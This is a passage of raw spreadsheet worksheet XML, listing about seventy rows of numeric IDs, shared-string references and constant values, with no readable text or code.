    <row r="34049" ht="15.75" customHeight="1">
      <c r="A34049" s="1">
        <v>19070.0</v>
      </c>
      <c r="B34049" s="2">
        <v>5.4608824E7</v>
      </c>
      <c r="C34049" s="2" t="s">
        <v>32784</v>
      </c>
      <c r="D34049" s="2">
        <v>1.0</v>
      </c>
      <c r="E34049" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34049" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34050" ht="15.75" customHeight="1">
      <c r="A34050" s="1">
        <v>19095.0</v>
      </c>
      <c r="B34050" s="2">
        <v>5.4675715E7</v>
      </c>
      <c r="C34050" s="2" t="s">
        <v>32784</v>
      </c>
      <c r="D34050" s="2">
        <v>1.0</v>
      </c>
      <c r="E34050" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34050" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34051" ht="15.75" customHeight="1">
      <c r="A34051" s="1">
        <v>19099.0</v>
      </c>
      <c r="B34051" s="2">
        <v>5.4688264E7</v>
      </c>
      <c r="C34051" s="2" t="s">
        <v>32785</v>
      </c>
      <c r="D34051" s="2">
        <v>1.0</v>
      </c>
      <c r="E34051" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34051" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34052" ht="15.75" customHeight="1">
      <c r="A34052" s="1">
        <v>19137.0</v>
      </c>
      <c r="B34052" s="2">
        <v>5.480695E7</v>
      </c>
      <c r="C34052" s="2" t="s">
        <v>32786</v>
      </c>
      <c r="D34052" s="2">
        <v>1.0</v>
      </c>
      <c r="E34052" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34052" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34053" ht="15.75" customHeight="1">
      <c r="A34053" s="1">
        <v>19153.0</v>
      </c>
      <c r="B34053" s="2">
        <v>5.4872301E7</v>
      </c>
      <c r="C34053" s="2" t="s">
        <v>32787</v>
      </c>
      <c r="D34053" s="2">
        <v>1.0</v>
      </c>
      <c r="E34053" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34053" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34054" ht="15.75" customHeight="1">
      <c r="A34054" s="1">
        <v>19255.0</v>
      </c>
      <c r="B34054" s="2">
        <v>5.5124866E7</v>
      </c>
      <c r="C34054" s="2" t="s">
        <v>32788</v>
      </c>
      <c r="D34054" s="2">
        <v>1.0</v>
      </c>
      <c r="E34054" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34054" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34055" ht="15.75" customHeight="1">
      <c r="A34055" s="1">
        <v>19303.0</v>
      </c>
      <c r="B34055" s="2">
        <v>5.522208E7</v>
      </c>
      <c r="C34055" s="2" t="s">
        <v>32789</v>
      </c>
      <c r="D34055" s="2">
        <v>1.0</v>
      </c>
      <c r="E34055" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34055" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34056" ht="15.75" customHeight="1">
      <c r="A34056" s="1">
        <v>19396.0</v>
      </c>
      <c r="B34056" s="2">
        <v>5.5575548E7</v>
      </c>
      <c r="C34056" s="2" t="s">
        <v>32790</v>
      </c>
      <c r="D34056" s="2">
        <v>1.0</v>
      </c>
      <c r="E34056" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34056" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34057" ht="15.75" customHeight="1">
      <c r="A34057" s="1">
        <v>19420.0</v>
      </c>
      <c r="B34057" s="2">
        <v>5.5635896E7</v>
      </c>
      <c r="C34057" s="2" t="s">
        <v>32791</v>
      </c>
      <c r="D34057" s="2">
        <v>1.0</v>
      </c>
      <c r="E34057" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34057" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34058" ht="15.75" customHeight="1">
      <c r="A34058" s="1">
        <v>19492.0</v>
      </c>
      <c r="B34058" s="2">
        <v>5.5885236E7</v>
      </c>
      <c r="C34058" s="2" t="s">
        <v>32792</v>
      </c>
      <c r="D34058" s="2">
        <v>1.0</v>
      </c>
      <c r="E34058" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34058" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34059" ht="15.75" customHeight="1">
      <c r="A34059" s="1">
        <v>19496.0</v>
      </c>
      <c r="B34059" s="2">
        <v>5.5898945E7</v>
      </c>
      <c r="C34059" s="2" t="s">
        <v>32793</v>
      </c>
      <c r="D34059" s="2">
        <v>1.0</v>
      </c>
      <c r="E34059" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34059" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34060" ht="15.75" customHeight="1">
      <c r="A34060" s="1">
        <v>19569.0</v>
      </c>
      <c r="B34060" s="2">
        <v>5.6136064E7</v>
      </c>
      <c r="C34060" s="2" t="s">
        <v>32794</v>
      </c>
      <c r="D34060" s="2">
        <v>1.0</v>
      </c>
      <c r="E34060" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34060" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34061" ht="15.75" customHeight="1">
      <c r="A34061" s="1">
        <v>19686.0</v>
      </c>
      <c r="B34061" s="2">
        <v>5.6468448E7</v>
      </c>
      <c r="C34061" s="2" t="s">
        <v>32795</v>
      </c>
      <c r="D34061" s="2">
        <v>1.0</v>
      </c>
      <c r="E34061" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34061" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34062" ht="15.75" customHeight="1">
      <c r="A34062" s="1">
        <v>19745.0</v>
      </c>
      <c r="B34062" s="2">
        <v>5.6691282E7</v>
      </c>
      <c r="C34062" s="2" t="s">
        <v>32796</v>
      </c>
      <c r="D34062" s="2">
        <v>1.0</v>
      </c>
      <c r="E34062" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34062" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34063" ht="15.75" customHeight="1">
      <c r="A34063" s="1">
        <v>19816.0</v>
      </c>
      <c r="B34063" s="2">
        <v>5.6955993E7</v>
      </c>
      <c r="C34063" s="2" t="s">
        <v>32797</v>
      </c>
      <c r="D34063" s="2">
        <v>1.0</v>
      </c>
      <c r="E34063" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34063" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34064" ht="15.75" customHeight="1">
      <c r="A34064" s="1">
        <v>19845.0</v>
      </c>
      <c r="B34064" s="2">
        <v>5.7086415E7</v>
      </c>
      <c r="C34064" s="2" t="s">
        <v>32798</v>
      </c>
      <c r="D34064" s="2">
        <v>1.0</v>
      </c>
      <c r="E34064" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34064" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34065" ht="15.75" customHeight="1">
      <c r="A34065" s="1">
        <v>19883.0</v>
      </c>
      <c r="B34065" s="2">
        <v>5.7257217E7</v>
      </c>
      <c r="C34065" s="2" t="s">
        <v>32799</v>
      </c>
      <c r="D34065" s="2">
        <v>1.0</v>
      </c>
      <c r="E34065" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34065" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34066" ht="15.75" customHeight="1">
      <c r="A34066" s="1">
        <v>19890.0</v>
      </c>
      <c r="B34066" s="2">
        <v>5.7285456E7</v>
      </c>
      <c r="C34066" s="2" t="s">
        <v>32800</v>
      </c>
      <c r="D34066" s="2">
        <v>1.0</v>
      </c>
      <c r="E34066" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34066" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34067" ht="15.75" customHeight="1">
      <c r="A34067" s="1">
        <v>19947.0</v>
      </c>
      <c r="B34067" s="2">
        <v>5.7495651E7</v>
      </c>
      <c r="C34067" s="2" t="s">
        <v>32801</v>
      </c>
      <c r="D34067" s="2">
        <v>1.0</v>
      </c>
      <c r="E34067" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34067" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34068" ht="15.75" customHeight="1">
      <c r="A34068" s="1">
        <v>19973.0</v>
      </c>
      <c r="B34068" s="2">
        <v>5.7583649E7</v>
      </c>
      <c r="C34068" s="2" t="s">
        <v>32802</v>
      </c>
      <c r="D34068" s="2">
        <v>1.0</v>
      </c>
      <c r="E34068" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34068" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34069" ht="15.75" customHeight="1">
      <c r="A34069" s="1">
        <v>20048.0</v>
      </c>
      <c r="B34069" s="2">
        <v>7946275.0</v>
      </c>
      <c r="C34069" s="2" t="s">
        <v>32803</v>
      </c>
      <c r="D34069" s="2">
        <v>1.0</v>
      </c>
      <c r="E34069" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34069" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34070" ht="15.75" customHeight="1">
      <c r="A34070" s="1">
        <v>20087.0</v>
      </c>
      <c r="B34070" s="2">
        <v>938394.0</v>
      </c>
      <c r="C34070" s="2" t="s">
        <v>32804</v>
      </c>
      <c r="D34070" s="2">
        <v>1.0</v>
      </c>
      <c r="E34070" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34070" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34071" ht="15.75" customHeight="1">
      <c r="A34071" s="1">
        <v>20118.0</v>
      </c>
      <c r="B34071" s="2">
        <v>5177573.0</v>
      </c>
      <c r="C34071" s="2" t="s">
        <v>32805</v>
      </c>
      <c r="D34071" s="2">
        <v>1.0</v>
      </c>
      <c r="E34071" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34071" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34072" ht="15.75" customHeight="1">
      <c r="A34072" s="1">
        <v>20126.0</v>
      </c>
      <c r="B34072" s="2">
        <v>1.0047681E7</v>
      </c>
      <c r="C34072" s="2" t="s">
        <v>32806</v>
      </c>
      <c r="D34072" s="2">
        <v>1.0</v>
      </c>
      <c r="E34072" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34072" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34073" ht="15.75" customHeight="1">
      <c r="A34073" s="1">
        <v>20140.0</v>
      </c>
      <c r="B34073" s="2">
        <v>1.0147121E7</v>
      </c>
      <c r="C34073" s="2" t="s">
        <v>32807</v>
      </c>
      <c r="D34073" s="2">
        <v>1.0</v>
      </c>
      <c r="E34073" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34073" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34074" ht="15.75" customHeight="1">
      <c r="A34074" s="1">
        <v>20201.0</v>
      </c>
      <c r="B34074" s="2">
        <v>1.0581377E7</v>
      </c>
      <c r="C34074" s="2" t="s">
        <v>32808</v>
      </c>
      <c r="D34074" s="2">
        <v>1.0</v>
      </c>
      <c r="E34074" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34074" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34075" ht="15.75" customHeight="1">
      <c r="A34075" s="1">
        <v>20287.0</v>
      </c>
      <c r="B34075" s="2">
        <v>1.1194974E7</v>
      </c>
      <c r="C34075" s="2" t="s">
        <v>32809</v>
      </c>
      <c r="D34075" s="2">
        <v>1.0</v>
      </c>
      <c r="E34075" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34075" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34076" ht="15.75" customHeight="1">
      <c r="A34076" s="1">
        <v>20335.0</v>
      </c>
      <c r="B34076" s="2">
        <v>1.1533975E7</v>
      </c>
      <c r="C34076" s="2" t="s">
        <v>32810</v>
      </c>
      <c r="D34076" s="2">
        <v>1.0</v>
      </c>
      <c r="E34076" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34076" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34077" ht="15.75" customHeight="1">
      <c r="A34077" s="1">
        <v>20362.0</v>
      </c>
      <c r="B34077" s="2">
        <v>1.1736318E7</v>
      </c>
      <c r="C34077" s="2" t="s">
        <v>32811</v>
      </c>
      <c r="D34077" s="2">
        <v>1.0</v>
      </c>
      <c r="E34077" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34077" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34078" ht="15.75" customHeight="1">
      <c r="A34078" s="1">
        <v>20445.0</v>
      </c>
      <c r="B34078" s="2">
        <v>1.2455058E7</v>
      </c>
      <c r="C34078" s="2" t="s">
        <v>32812</v>
      </c>
      <c r="D34078" s="2">
        <v>1.0</v>
      </c>
      <c r="E34078" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34078" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34079" ht="15.75" customHeight="1">
      <c r="A34079" s="1">
        <v>20470.0</v>
      </c>
      <c r="B34079" s="2">
        <v>1.2782007E7</v>
      </c>
      <c r="C34079" s="2" t="s">
        <v>32813</v>
      </c>
      <c r="D34079" s="2">
        <v>1.0</v>
      </c>
      <c r="E34079" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34079" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34080" ht="15.75" customHeight="1">
      <c r="A34080" s="1">
        <v>20477.0</v>
      </c>
      <c r="B34080" s="2">
        <v>1.282873E7</v>
      </c>
      <c r="C34080" s="2" t="s">
        <v>32814</v>
      </c>
      <c r="D34080" s="2">
        <v>1.0</v>
      </c>
      <c r="E34080" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34080" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34081" ht="15.75" customHeight="1">
      <c r="A34081" s="1">
        <v>20509.0</v>
      </c>
      <c r="B34081" s="2">
        <v>1.3018771E7</v>
      </c>
      <c r="C34081" s="2" t="s">
        <v>32815</v>
      </c>
      <c r="D34081" s="2">
        <v>1.0</v>
      </c>
      <c r="E34081" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34081" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34082" ht="15.75" customHeight="1">
      <c r="A34082" s="1">
        <v>20650.0</v>
      </c>
      <c r="B34082" s="2">
        <v>1.4255154E7</v>
      </c>
      <c r="C34082" s="2" t="s">
        <v>32816</v>
      </c>
      <c r="D34082" s="2">
        <v>1.0</v>
      </c>
      <c r="E34082" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34082" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34083" ht="15.75" customHeight="1">
      <c r="A34083" s="1">
        <v>20678.0</v>
      </c>
      <c r="B34083" s="2">
        <v>1.4425249E7</v>
      </c>
      <c r="C34083" s="2" t="s">
        <v>32817</v>
      </c>
      <c r="D34083" s="2">
        <v>1.0</v>
      </c>
      <c r="E34083" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34083" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34084" ht="15.75" customHeight="1">
      <c r="A34084" s="1">
        <v>20684.0</v>
      </c>
      <c r="B34084" s="2">
        <v>1.4460435E7</v>
      </c>
      <c r="C34084" s="2" t="s">
        <v>32818</v>
      </c>
      <c r="D34084" s="2">
        <v>1.0</v>
      </c>
      <c r="E34084" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34084" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34085" ht="15.75" customHeight="1">
      <c r="A34085" s="1">
        <v>20714.0</v>
      </c>
      <c r="B34085" s="2">
        <v>1.4612646E7</v>
      </c>
      <c r="C34085" s="2" t="s">
        <v>32819</v>
      </c>
      <c r="D34085" s="2">
        <v>1.0</v>
      </c>
      <c r="E34085" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34085" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34086" ht="15.75" customHeight="1">
      <c r="A34086" s="1">
        <v>20838.0</v>
      </c>
      <c r="B34086" s="2">
        <v>1.5596444E7</v>
      </c>
      <c r="C34086" s="2" t="s">
        <v>32820</v>
      </c>
      <c r="D34086" s="2">
        <v>1.0</v>
      </c>
      <c r="E34086" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34086" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34087" ht="15.75" customHeight="1">
      <c r="A34087" s="1">
        <v>20878.0</v>
      </c>
      <c r="B34087" s="2">
        <v>1.6031239E7</v>
      </c>
      <c r="C34087" s="2" t="s">
        <v>32821</v>
      </c>
      <c r="D34087" s="2">
        <v>1.0</v>
      </c>
      <c r="E34087" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34087" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34088" ht="15.75" customHeight="1">
      <c r="A34088" s="1">
        <v>20953.0</v>
      </c>
      <c r="B34088" s="2">
        <v>1.6647611E7</v>
      </c>
      <c r="C34088" s="2" t="s">
        <v>32822</v>
      </c>
      <c r="D34088" s="2">
        <v>1.0</v>
      </c>
      <c r="E34088" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34088" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34089" ht="15.75" customHeight="1">
      <c r="A34089" s="1">
        <v>20982.0</v>
      </c>
      <c r="B34089" s="2">
        <v>1.6981532E7</v>
      </c>
      <c r="C34089" s="2" t="s">
        <v>32823</v>
      </c>
      <c r="D34089" s="2">
        <v>1.0</v>
      </c>
      <c r="E34089" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34089" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34090" ht="15.75" customHeight="1">
      <c r="A34090" s="1">
        <v>21011.0</v>
      </c>
      <c r="B34090" s="2">
        <v>1.7277949E7</v>
      </c>
      <c r="C34090" s="2" t="s">
        <v>32824</v>
      </c>
      <c r="D34090" s="2">
        <v>1.0</v>
      </c>
      <c r="E34090" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34090" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34091" ht="15.75" customHeight="1">
      <c r="A34091" s="1">
        <v>21076.0</v>
      </c>
      <c r="B34091" s="2">
        <v>1.7985811E7</v>
      </c>
      <c r="C34091" s="2" t="s">
        <v>32825</v>
      </c>
      <c r="D34091" s="2">
        <v>1.0</v>
      </c>
      <c r="E34091" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34091" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34092" ht="15.75" customHeight="1">
      <c r="A34092" s="1">
        <v>21104.0</v>
      </c>
      <c r="B34092" s="2">
        <v>1.8140557E7</v>
      </c>
      <c r="C34092" s="2" t="s">
        <v>32826</v>
      </c>
      <c r="D34092" s="2">
        <v>1.0</v>
      </c>
      <c r="E34092" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34092" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34093" ht="15.75" customHeight="1">
      <c r="A34093" s="1">
        <v>21153.0</v>
      </c>
      <c r="B34093" s="2">
        <v>1.8848E7</v>
      </c>
      <c r="C34093" s="2" t="s">
        <v>32827</v>
      </c>
      <c r="D34093" s="2">
        <v>1.0</v>
      </c>
      <c r="E34093" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34093" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34094" ht="15.75" customHeight="1">
      <c r="A34094" s="1">
        <v>21219.0</v>
      </c>
      <c r="B34094" s="2">
        <v>1.9592771E7</v>
      </c>
      <c r="C34094" s="2" t="s">
        <v>32828</v>
      </c>
      <c r="D34094" s="2">
        <v>1.0</v>
      </c>
      <c r="E34094" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34094" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34095" ht="15.75" customHeight="1">
      <c r="A34095" s="1">
        <v>21225.0</v>
      </c>
      <c r="B34095" s="2">
        <v>1.9617311E7</v>
      </c>
      <c r="C34095" s="2" t="s">
        <v>32829</v>
      </c>
      <c r="D34095" s="2">
        <v>1.0</v>
      </c>
      <c r="E34095" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34095" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34096" ht="15.75" customHeight="1">
      <c r="A34096" s="1">
        <v>21341.0</v>
      </c>
      <c r="B34096" s="2">
        <v>2.1161358E7</v>
      </c>
      <c r="C34096" s="2" t="s">
        <v>32830</v>
      </c>
      <c r="D34096" s="2">
        <v>1.0</v>
      </c>
      <c r="E34096" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34096" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34097" ht="15.75" customHeight="1">
      <c r="A34097" s="1">
        <v>21376.0</v>
      </c>
      <c r="B34097" s="2">
        <v>2.1641698E7</v>
      </c>
      <c r="C34097" s="2" t="s">
        <v>32831</v>
      </c>
      <c r="D34097" s="2">
        <v>1.0</v>
      </c>
      <c r="E34097" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34097" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34098" ht="15.75" customHeight="1">
      <c r="A34098" s="1">
        <v>21384.0</v>
      </c>
      <c r="B34098" s="2">
        <v>2.1686959E7</v>
      </c>
      <c r="C34098" s="2" t="s">
        <v>32832</v>
      </c>
      <c r="D34098" s="2">
        <v>1.0</v>
      </c>
      <c r="E34098" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34098" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34099" ht="15.75" customHeight="1">
      <c r="A34099" s="1">
        <v>21398.0</v>
      </c>
      <c r="B34099" s="2">
        <v>2.1803529E7</v>
      </c>
      <c r="C34099" s="2" t="s">
        <v>32833</v>
      </c>
      <c r="D34099" s="2">
        <v>1.0</v>
      </c>
      <c r="E34099" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34099" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34100" ht="15.75" customHeight="1">
      <c r="A34100" s="1">
        <v>21473.0</v>
      </c>
      <c r="B34100" s="2">
        <v>2.2969355E7</v>
      </c>
      <c r="C34100" s="2" t="s">
        <v>32834</v>
      </c>
      <c r="D34100" s="2">
        <v>1.0</v>
      </c>
      <c r="E34100" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34100" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34101" ht="15.75" customHeight="1">
      <c r="A34101" s="1">
        <v>21614.0</v>
      </c>
      <c r="B34101" s="2">
        <v>2.4519876E7</v>
      </c>
      <c r="C34101" s="2" t="s">
        <v>32835</v>
      </c>
      <c r="D34101" s="2">
        <v>1.0</v>
      </c>
      <c r="E34101" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34101" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34102" ht="15.75" customHeight="1">
      <c r="A34102" s="1">
        <v>21722.0</v>
      </c>
      <c r="B34102" s="2">
        <v>2.5604603E7</v>
      </c>
      <c r="C34102" s="2" t="s">
        <v>32836</v>
      </c>
      <c r="D34102" s="2">
        <v>1.0</v>
      </c>
      <c r="E34102" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34102" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34103" ht="15.75" customHeight="1">
      <c r="A34103" s="1">
        <v>21740.0</v>
      </c>
      <c r="B34103" s="2">
        <v>2.5890083E7</v>
      </c>
      <c r="C34103" s="2" t="s">
        <v>32837</v>
      </c>
      <c r="D34103" s="2">
        <v>1.0</v>
      </c>
      <c r="E34103" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34103" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34104" ht="15.75" customHeight="1">
      <c r="A34104" s="1">
        <v>21751.0</v>
      </c>
      <c r="B34104" s="2">
        <v>2.6044069E7</v>
      </c>
      <c r="C34104" s="2" t="s">
        <v>32838</v>
      </c>
      <c r="D34104" s="2">
        <v>1.0</v>
      </c>
      <c r="E34104" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34104" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34105" ht="15.75" customHeight="1">
      <c r="A34105" s="1">
        <v>21761.0</v>
      </c>
      <c r="B34105" s="2">
        <v>2.6119612E7</v>
      </c>
      <c r="C34105" s="2" t="s">
        <v>32839</v>
      </c>
      <c r="D34105" s="2">
        <v>1.0</v>
      </c>
      <c r="E34105" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34105" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34106" ht="15.75" customHeight="1">
      <c r="A34106" s="1">
        <v>21800.0</v>
      </c>
      <c r="B34106" s="2">
        <v>2.666852E7</v>
      </c>
      <c r="C34106" s="2" t="s">
        <v>32840</v>
      </c>
      <c r="D34106" s="2">
        <v>1.0</v>
      </c>
      <c r="E34106" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34106" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34107" ht="15.75" customHeight="1">
      <c r="A34107" s="1">
        <v>21848.0</v>
      </c>
      <c r="B34107" s="2">
        <v>2.7168211E7</v>
      </c>
      <c r="C34107" s="2" t="s">
        <v>32841</v>
      </c>
      <c r="D34107" s="2">
        <v>1.0</v>
      </c>
      <c r="E34107" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34107" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34108" ht="15.75" customHeight="1">
      <c r="A34108" s="1">
        <v>21850.0</v>
      </c>
      <c r="B34108" s="2">
        <v>2.7169854E7</v>
      </c>
      <c r="C34108" s="2" t="s">
        <v>32842</v>
      </c>
      <c r="D34108" s="2">
        <v>1.0</v>
      </c>
      <c r="E34108" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34108" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34109" ht="15.75" customHeight="1">
      <c r="A34109" s="1">
        <v>21879.0</v>
      </c>
      <c r="B34109" s="2">
        <v>2.7719191E7</v>
      </c>
      <c r="C34109" s="2" t="s">
        <v>32843</v>
      </c>
      <c r="D34109" s="2">
        <v>1.0</v>
      </c>
      <c r="E34109" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34109" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34110" ht="15.75" customHeight="1">
      <c r="A34110" s="1">
        <v>21880.0</v>
      </c>
      <c r="B34110" s="2">
        <v>2.7719279E7</v>
      </c>
      <c r="C34110" s="2" t="s">
        <v>32843</v>
      </c>
      <c r="D34110" s="2">
        <v>1.0</v>
      </c>
      <c r="E34110" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34110" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34111" ht="15.75" customHeight="1">
      <c r="A34111" s="1">
        <v>21881.0</v>
      </c>
      <c r="B34111" s="2">
        <v>2.7721006E7</v>
      </c>
      <c r="C34111" s="2" t="s">
        <v>32843</v>
      </c>
      <c r="D34111" s="2">
        <v>1.0</v>
      </c>
      <c r="E34111" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34111" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34112" ht="15.75" customHeight="1">
      <c r="A34112" s="1">
        <v>21882.0</v>
      </c>
      <c r="B34112" s="2">
        <v>2.7721026E7</v>
      </c>
      <c r="C34112" s="2" t="s">
        <v>32843</v>
      </c>
      <c r="D34112" s="2">
        <v>1.0</v>
      </c>
      <c r="E34112" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34112" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34113" ht="15.75" customHeight="1">
      <c r="A34113" s="1">
        <v>21884.0</v>
      </c>
      <c r="B34113" s="2">
        <v>2.7752876E7</v>
      </c>
      <c r="C34113" s="2" t="s">
        <v>32844</v>
      </c>
      <c r="D34113" s="2">
        <v>1.0</v>
      </c>
      <c r="E34113" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34113" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34114" ht="15.75" customHeight="1">
      <c r="A34114" s="1">
        <v>21942.0</v>
      </c>
      <c r="B34114" s="2">
        <v>2.871355E7</v>
      </c>
      <c r="C34114" s="2" t="s">
        <v>32845</v>
      </c>
      <c r="D34114" s="2">
        <v>1.0</v>
      </c>
      <c r="E34114" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34114" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34115" ht="15.75" customHeight="1">
      <c r="A34115" s="1">
        <v>22050.0</v>
      </c>
      <c r="B34115" s="2">
        <v>3.0366814E7</v>
      </c>
      <c r="C34115" s="2" t="s">
        <v>32846</v>
      </c>
      <c r="D34115" s="2">
        <v>1.0</v>
      </c>
      <c r="E34115" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34115" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
